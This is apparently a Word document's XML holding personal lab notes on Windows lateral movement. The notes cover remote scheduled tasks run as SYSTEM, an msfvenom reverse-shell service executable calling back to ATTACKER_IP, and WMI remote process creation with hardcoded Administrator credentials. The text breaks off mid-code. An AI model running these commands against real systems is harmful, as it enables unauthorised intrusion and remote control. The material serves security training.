    <w:p w14:paraId="0B559F26" w14:textId="1185E5A1" w:rsidR="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:r>
        <w:t>Creating Remote Scheduled Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ADEB9C" w14:textId="3A37A6AD" w:rsidR="00096D6E" w:rsidRPr="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:t xml:space="preserve">schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "&lt;command/payload to execute&gt;" /sc ONCE /sd 01/01/1970 /st 00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3499D0" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRPr="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:t>schtasks /s TARGET /run /TN "THMtask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8286D3" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRPr="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00096D6E">
        <w:t>schtasks /S TARGET /TN "THMtask1" /DELETE /F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C13540F" w14:textId="77777777" w:rsidR="00096D6E" w:rsidRDefault="00096D6E" w:rsidP="00096D6E"/>
    <w:p w14:paraId="01716763" w14:textId="0C5D8B5F" w:rsidR="00E86C2B" w:rsidRDefault="00E86C2B" w:rsidP="00096D6E">
      <w:r>
        <w:t xml:space="preserve">Note: normal .exe files not executed as the </w:t>
      </w:r>
      <w:r w:rsidR="006C4848">
        <w:t xml:space="preserve">.exe binary or service executable files, the normal .exe stopped after execution from SC. </w:t>
      </w:r>
      <w:r w:rsidR="006C4848" w:rsidRPr="006C4848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Msvenom</w:t>
      </w:r>
      <w:r w:rsidR="006C4848">
        <w:t xml:space="preserve"> help to create service executables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA02CA" w14:textId="4AE74D24" w:rsidR="006C4848" w:rsidRDefault="006C4848" w:rsidP="006C4848">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="006C4848">
        <w:t>msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=ATTACKER_IP LPORT=4444 -o myservice.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE25225" w14:textId="0A037BC0" w:rsidR="004668D1" w:rsidRPr="00931A5C" w:rsidRDefault="00A333BB" w:rsidP="00931A5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931A5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Moving Laterally Using WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F585CA1" w14:textId="3D9A1DD0" w:rsidR="006C4848" w:rsidRDefault="00A333BB" w:rsidP="00A333BB">
      <w:r w:rsidRPr="00A333BB">
        <w:t>Windows Management Instrumentation (WMI)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:t>implementation of Web-Based Enterprise Management (WBEM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:t>enterprise standard for accessing management information across devices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:t>allows administrators to perform standard management tasks</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241694F" w14:textId="77777777" w:rsidR="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A333BB"/>
    <w:p w14:paraId="0CC08D8C" w14:textId="2F38A4AC" w:rsidR="00A333BB" w:rsidRPr="00990322" w:rsidRDefault="00A333BB" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connecting to WMI From PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00B45E29" w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (create Credentials &amp; Session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97E7B3" w14:textId="3DAC8C95" w:rsidR="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A333BB">
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:t>reate a PSCredential object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC22E7" w14:textId="77777777" w:rsidR="00A333BB" w:rsidRPr="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A33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A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$username = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'Administrator'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203A279" w14:textId="77777777" w:rsidR="00A333BB" w:rsidRPr="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A33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A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$password = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'Mypass123'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D02C2" w14:textId="77777777" w:rsidR="00A333BB" w:rsidRPr="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A33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A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$securePassword = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ConvertTo-SecureString</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> $password -AsPlainText -Force;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF7743" w14:textId="77777777" w:rsidR="00A333BB" w:rsidRPr="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A333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A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$credential = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>New-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Management.Automation.PSCredential $username, $securePassword;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694C0D42" w14:textId="77777777" w:rsidR="00A333BB" w:rsidRDefault="00A333BB" w:rsidP="00A333BB"/>
    <w:p w14:paraId="7968ACB3" w14:textId="4693C584" w:rsidR="004668D1" w:rsidRDefault="00A333BB" w:rsidP="00A333BB">
      <w:r w:rsidRPr="00A333BB">
        <w:t>establish a WMI session using either of the following protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E7899" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCOM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:t> RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37053CE1" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wsman:</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:t> WinRM will be used for connecting to WMI. This protocol uses ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EF548F" w14:textId="77777777" w:rsidR="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46"/>
    <w:p w14:paraId="4EE80951" w14:textId="790455CC" w:rsidR="004668D1" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:r w:rsidRPr="00111C46">
        <w:lastRenderedPageBreak/>
        <w:t>establish a WMI session from PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E4B44" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C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111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Opt = </w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>New-CimSessionOption</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Protocol DCOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44286082" w14:textId="2B693C06" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C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111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Session = </w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>New-Cimsession</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -ComputerName TARGET -Credential $credential -SessionOption</w:t>
      </w:r>
      <w:r w:rsidR="001702B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$Opt -ErrorAction Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D55EBD1" w14:textId="7A26F8EC" w:rsidR="004668D1" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>New-CimSessionOption</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmdlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to configure the connection options for the WMI session, including the connection protocol. The options and credentials are then passed to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> New-CimSession cmdlet </w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to establish a session against a remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C18534F" w14:textId="0C1D8C52" w:rsidR="00932D3C" w:rsidRDefault="00932D3C" w:rsidP="00932D3C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CIM (Common Information Model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6A111" w14:textId="30EC8A22" w:rsidR="00611434" w:rsidRPr="00111C46" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client-side object</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> representing a connection to a local computer or a remote computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA977E7" w14:textId="77777777" w:rsidR="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46"/>
    <w:p w14:paraId="2ACCA920" w14:textId="5D16618E" w:rsidR="00111C46" w:rsidRPr="00990322" w:rsidRDefault="00111C46" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote Process Creation Using WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD50931" w14:textId="34298AEC" w:rsidR="004668D1" w:rsidRDefault="00111C46" w:rsidP="004668D1">
      <w:r>
        <w:t>After Creating Session with The Target Now create and run commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533C85A" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A1936" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:t>135/TCP, 49152-65535/TCP (DCERPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5F167" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:t>5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCACC85" w14:textId="77777777" w:rsidR="00111C46" w:rsidRPr="00111C46" w:rsidRDefault="00111C46" w:rsidP="00111C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00111C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Group Memberships:</w:t>
      </w:r>
      <w:r w:rsidRPr="00111C46">
        <w:t> Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E06A24" w14:textId="35977B27" w:rsidR="00111C46" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:r w:rsidRPr="00B45E29">
        <w:t xml:space="preserve">WMI </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>does not return command output</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:t>. It just tells you if the process was created successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B03088" w14:textId="3FE9CF05" w:rsidR="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:r>
        <w:t>Ex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011A9EB" w14:textId="01E67E29" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:t>Runs powershell.exe remotely,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B08CFD" w14:textId="22359A6A" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:t>Executes a command that creates or overwrites a file C:\text.txt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D9FFA" w14:textId="6F31D907" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:t>Write the text munrawashere into that file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70199CC2"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noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Command = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219FB0AB"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noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06496312"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noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Invoke-CimMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A5FF0"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noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
